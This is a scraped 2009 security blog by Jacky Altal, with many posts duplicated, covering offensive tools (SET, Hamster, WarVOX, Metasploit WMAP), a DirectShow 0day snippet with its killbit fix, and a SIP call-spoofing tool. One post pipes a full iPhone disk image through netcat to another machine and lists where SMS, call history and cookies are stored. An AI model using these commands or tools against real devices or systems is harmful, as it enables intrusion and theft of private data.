A new Anti Forensics tool have been released this week, Download link:decaf
"According to the Register, the program deletes temporary files or processes associated with COFEE, erases all COFEE logs, disables USB drives, and contaminates or spoofs a variety of MAC addresses to muddy forensic tracks."
Read the full article:
Hackers Brew Self-Destruct Code to Counter Police Forensics
Tuesday, December 15, 2009
Wednesday, November 11, 2009
Wednesday, October 7, 2009
Ready? ./set
Social Engineer Toolkit:
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools,
SET has two main methods of attack, one is utilizing Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing.
The SET is designed to make complex social engineering tasks relatively simple for you by allowing you to utilize a robust framework for penetration tests.
SET works with metasploit and basicaly targets on automatic mail and website attack.
The Social Engineering Toolkit (SET) is a python-driven suite of custom tools,
SET has two main methods of attack, one is utilizing Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing.
The SET is designed to make complex social engineering tasks relatively simple for you by allowing you to utilize a robust framework for penetration tests.
SET works with metasploit and basicaly targets on automatic mail and website attack.
Email password leak update
After the leak of 10,000 Hotmail and Windows live email passwords and details yesterday, this morning it emerges that another list containing 20,000 e-mail addresses and passwords from Hotmail, Yahoo, AOL, Gmail and others service providers has been posted online.
There were more then 10,028 pairs of user names and passwords posted to multiple pages of public upload website like Pastebin.com, some of which remained live at time of writing. The stash is likely only a small sample of a much larger file,
Wouldn't it be great if this phishing was somehow linked to Mafia Wars or any other FB APP? could it be a phising attack?
There were more then 10,028 pairs of user names and passwords posted to multiple pages of public upload website like Pastebin.com, some of which remained live at time of writing. The stash is likely only a small sample of a much larger file,
Wouldn't it be great if this phishing was somehow linked to Mafia Wars or any other FB APP? could it be a phising attack?
Tuesday, August 25, 2009
Clarification
I would like to clarify the article that have been posted yesterday @themarker regards the security breach in Cellcom website. I didn`t do any penetration testing or auditing on the website.
I just got the link and been asked for my professional opinion. As far as i know, the security department knew about the risks that this info can lead. that`s all.
M4y th3 S0urce b3 w1th u5.
I just got the link and been asked for my professional opinion. As far as i know, the security department knew about the risks that this info can lead. that`s all.
M4y th3 S0urce b3 w1th u5.
Audit VoiP++
A great suite of exploring, classifying, and auditing telephone systems that can be found in Warvox
the suite of tools provides the unique ability to classify all telephone lines in a given range, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders.
WarVOX is intended for legal security assessment, asset inventory, and research purposes only.
the suite of tools provides the unique ability to classify all telephone lines in a given range, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders.
WarVOX is intended for legal security assessment, asset inventory, and research purposes only.
Tuesday, July 7, 2009
DirectShow 0day in the wild
DirectShow 0day is a high rate of 0day exploit, the current outbreak has already begun last week online. In order for the attack to work the victim needs to use XP built-in Windows Media Player to play media files which in turn triggers internal loopholes.
This is a client side (IE) exploit, so visiting a malicious site will result in infection.
Attack characteristics are as follows:
(I`ve found the code on http://**.****.cn website)
var appllaa='0';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Microsoft's advisory offers workarounds for the issue (from today), including setting the killbit for the ActiveX control.
There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.
\x1 Create the following Key
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
\x2 Create a dword value named "Compatibility Flags" and give it a value of 400.
This is a client side (IE) exploit, so visiting a malicious site will result in infection.
Attack characteristics are as follows:
(I`ve found the code on http://**.****.cn website)
var appllaa='0';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Microsoft's advisory offers workarounds for the issue (from today), including setting the killbit for the ActiveX control.
There is one known hotfix and that is to set a "kill bit" in the registry for the ActiveX component.
\x1 Create the following Key
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
\x2 Create a dword value named "Compatibility Flags" and give it a value of 400.
Saturday, June 27, 2009
Let it sn0w
The iPod/iPhone 3G jailbreak is out. The iphone-dev team just released the 24kpwn LLB patch to allow for a persistent jailbreak. The team had been hanging on to this patch because there was the possibility the exploit could be used on future iPhone versions. Unfortunately, a group started selling the code, so the team was forced to release it for free. There is a tutorial available for updating a factory reset iPod/iPhone (backup link).
That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the iPhone 3GS.
Let it ultrasn0w....
That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the iPhone 3GS.
Let it ultrasn0w....
Wednesday, June 17, 2009
Tuesday, May 26, 2009
[Sum]mation ILHack
Good morning All! First, I would like to thank Yaniv Miron for organizing such a great conference and inviting me to speak about VoIP Tactics && Exploitaion at ILHack 2009.
Next, this one goes to all of my Students/Friends/Colleages thanks for the BIG support. You are all in my local subnet ;)
Special 10x to SIPM4ST3R yossef cohen for the lab organization, coding, and talking about the SIP Protocol as a part of the lecture.
The presentation, video of the lecture and source code for(SIPy and sip00fer) will be available --> ILHack download section during this weekend.
Hope to see you all, soon.
Jacky Altal
Next, this one goes to all of my Students/Friends/Colleages thanks for the BIG support. You are all in my local subnet ;)
Special 10x to SIPM4ST3R yossef cohen for the lab organization, coding, and talking about the SIP Protocol as a part of the lecture.
The presentation, video of the lecture and source code for(SIPy and sip00fer) will be available --> ILHack download section during this weekend.
Hope to see you all, soon.
Jacky Altal
Wednesday, May 20, 2009
Saturday, May 9, 2009
sip00fer
After a looong week, i`ve finished my case study on PBX (Asterisk). A new 1.6.1.0 Asterisk version was installed on CentOS, a great disto. and by the help of the SIP M4ST3R Yossef{at}maxxvoice{dot}com I managed to \install\ AND \configure\ my new PBX up&&running in few hours. [./configure; make; make install] simple as that.
Then, I started testing my Asterisk box, as i saw a sample code that can create a fake call to any extension on metasploit framework. The code didn`t work on against a new 1.6.0.5 as Yossef found that the CSeq var is missing so i decided to implement it by my self, i used RFC3261 to deeply understand the protocol and to expend my research to this fascinating area.
I wrote a POC code in python and then convert it to C++ the POC will build a fake packet and send it to sip client.
The code will be posted soon -> ilHack 2009 <- along with a new SIPcliFuzzer.
Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]
Example: sip00fer 13.37.7.1 31317 101 jackjack
Then, I started testing my Asterisk box, as i saw a sample code that can create a fake call to any extension on metasploit framework. The code didn`t work on against a new 1.6.0.5 as Yossef found that the CSeq var is missing so i decided to implement it by my self, i used RFC3261 to deeply understand the protocol and to expend my research to this fascinating area.
I wrote a POC code in python and then convert it to C++ the POC will build a fake packet and send it to sip client.
The code will be posted soon -> ilHack 2009 <- along with a new SIPcliFuzzer.
Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]
Example: sip00fer 13.37.7.1 31317 101 jackjack
Monday, April 27, 2009
Sidejacking
Hamster is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session.
Download Link
Download Link
Monday, April 6, 2009
Web (rat)Proxy
"Ratproxy is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments."
Download ratproxy from the following Link
OR use the following commands:
$> wget http://ratproxy.googlecode.com/files/ratproxy-1.56.tar.gz
$> tar xvf ratproxy-1.56.tar.gz
$> make
On Firefox go to |Tools|Options|Advanced|Network|settings choose manual proxy (rat address). and execute ratproxy with the following command:
$> ./ratproxy -w logfile -d domaintoscan -rlextifscpjm
To get a report in html file use:
$> -./ratproxy-report.sh logfile > report.html
Jacky Altal
Download ratproxy from the following Link
OR use the following commands:
$> wget http://ratproxy.googlecode.com/files/ratproxy-1.56.tar.gz
$> tar xvf ratproxy-1.56.tar.gz
$> make
On Firefox go to |Tools|Options|Advanced|Network|settings choose manual proxy (rat address). and execute ratproxy with the following command:
$> ./ratproxy -w logfile -d domaintoscan -rlextifscpjm
To get a report in html file use:
$> -./ratproxy-report.sh logfile > report.html
Jacky Altal
WPA Rainbow tables
Offensive security released a list of Cowpatty WPA tables, SSID Specific, using a 49 Million WPA optimised password dictionary file. Each Table is 1.9 GB.
Any one can help by seeding these files.
Any one can help by seeding these files.
Infected with Confliker?
Conficker Test is a simple visual test that any one can take in order to evaluate a windows pc just by surfing to this page. Conficker is known to block access to over 100 anti-virus and security websites. This page will loads images from blocked security and antivirus websites.
If you are blocked from loading the remote images in the first row of the top table above (AV/security sites) but not blocked from loading the remote images in the second row (websites of alternative operating systems) then your Windows PC may be infected by Conficker (or some other malicious software).
This test was originally developed by Joe Stewart. As you can see it is a simple test method which can be used by any one.
a link to Confliker removal tool can be found HERE
Jacky Altal
 |  |
 |  |
If you are blocked from loading the remote images in the first row of the top table above (AV/security sites) but not blocked from loading the remote images in the second row (websites of alternative operating systems) then your Windows PC may be infected by Conficker (or some other malicious software).
This test was originally developed by Joe Stewart. As you can see it is a simple test method which can be used by any one.
a link to Confliker removal tool can be found HERE
Jacky Altal
Thursday, April 2, 2009
Manipulating Client Side Scripts
As you can see in the following link posted by Lament just yesterday, there is a big security flow in Ynet forums.
I have read the mails between yaniv and Ynet respone team. And it seams like they are really dosent care. I`m not sure if yaniv did the right thing and post this movie, but no doubt that something had to be done.
I have to admit that this particular flow was known for a while, and to be honest there are many others.....
I have read the mails between yaniv and Ynet respone team. And it seams like they are really dosent care. I`m not sure if yaniv did the right thing and post this movie, but no doubt that something had to be done.
I have to admit that this particular flow was known for a while, and to be honest there are many others.....
Attacking SMM Memory via Intel® CPU Cache Poisoning
Attacking SMM Memory via Intel® CPU Cache Poisoning (March 2009) - a research paper published by Rafal Wojtczuk and Joanna Rutkowska describing a new attack that allows to compromise the integrity of the System Management Mode on Intel-based systems.
PDF
Sunday, March 1, 2009
ilHack \x32\x30\x30\x39
ifis.org.il the israeli security forum and yaniv Miron (CISO grad) announced the 2009 Hacking convention.
Additional information can be found in the following link:
-ilhack 2009 convention 4/5/09
Additional information can be found in the following link:
-ilhack 2009 convention 4/5/09
Thursday, February 26, 2009
SQL Queries
Still in the top 10 security threats for 2009 Web Application attacks. During my work i`m facing DB`s that i`m not working on regular basis, which got me to c0mpile a list of queries for mssql, oracle, mysql, postgresql and msaccess. In the following xls file you can find the most used sql injection queries. The list >> constructed from data that i picked from several web sites and dring the days and n1ght of /me @work ;)
Tuesday, February 17, 2009
iPhone 2.2 Backup
In order to make a bit by bit copy use the following method:
On your *nix box open up netcat:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone/ssh execute the following:
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
If you want to browse y0ur iPhone contents just follow the following directories:
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Adress book /mobile/Library/AddressBook/AddressBook.sqlitedb
voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /moblie/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
ג'קי אלטל
On your *nix box open up netcat:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone/ssh execute the following:
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
If you want to browse y0ur iPhone contents just follow the following directories:
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Adress book /mobile/Library/AddressBook/AddressBook.sqlitedb
voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /moblie/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
ג'קי אלטל
Advanced Exploitation with Metasploit
I decided to write a post about the new/advanced features in my favorite exploitation framework Metasploit. Those improved tools/features in the advanced framework includes wmap (application mapping), autopwn (what does it sounds like?)
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to wmap database
>db_connect wmap.db
Now just add web application target address
>wmap_targets -a http://127.0.0.1
Set it to the new target with the following command:
>wmap_targets -s 1
wmap_run - execute application mapping
The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
wmap_reports - view web application report
Test your application
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to wmap database
>db_connect wmap.db
Now just add web application target address
>wmap_targets -a http://127.0.0.1
Set it to the new target with the following command:
>wmap_targets -s 1
wmap_run - execute application mapping
The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
wmap_reports - view web application report
Test your application
Wednesday, February 11, 2009
BackTrack 4 Beta released
BT4 - New & improved version, The best so far......another great work by the remote exploit team. some new and exciting features. The most significant of these changes is the expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution".
DOWNLOAD: BackTrack 4 Beta
DOWNLOAD: BackTrack 4 Beta
Subscribe to:
Posts (Atom)
Posts
